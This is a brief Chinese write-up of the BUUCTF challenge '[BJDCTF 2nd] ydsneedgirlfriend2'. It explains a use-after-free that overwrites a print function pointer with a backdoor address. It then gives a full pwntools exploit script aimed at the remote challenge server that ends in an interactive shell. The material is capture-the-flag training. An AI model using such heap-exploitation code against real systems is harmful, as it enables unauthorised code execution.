buuctf [BJDCTF 2nd]ydsneedgirlfriend2 UAF

UAF题

先申请一个看看结构


把print的位置改为backdoor的地址
先dele

申请0x10， 然后就可以覆盖print的地址了，然后show就可以跳转到backdoor

exp：

from pwn import *
from LibcSearcher import * 

local_file  = './ydsneedgirlfriend2'
local_libc  = '/lib/x86_64-linux-gnu/libc-2.23.so'
remote_libc = './libc-2.23.so'
 
 
select = 1

if select == 0:
    r = process(local_file)
    #libc = ELF(local_libc)
else:
    r = remote('node3.buuoj.cn', 29939)
    #libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'
context.arch = elf.arch

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims 		    :r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info_addr = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))

def debug(cmd=''):
     gdb.attach(r,cmd)

def add(leng, name):
    sla('choice :\n', '1')
    sla('length of her name:\n', str(leng))
    sla('tell me her name:\n', name)

def dele(index):
    sla('choice :\n', '2')
    sla('Index :', str(index))

def show(index):
    sla('choice :\n', '3')
    sla('Index :', str(index))

backdoor = 0x400D86
add(0x18, 'aaaa') #0
#add(0x18, 'bbbb') #1
#show(0)
#gdb.attach(r)
dele(0)
#gdb.attach(r)
add(0x10, 'a'*8+p64(backdoor))
#gdb.attach(r)
show(0)


r.interactive()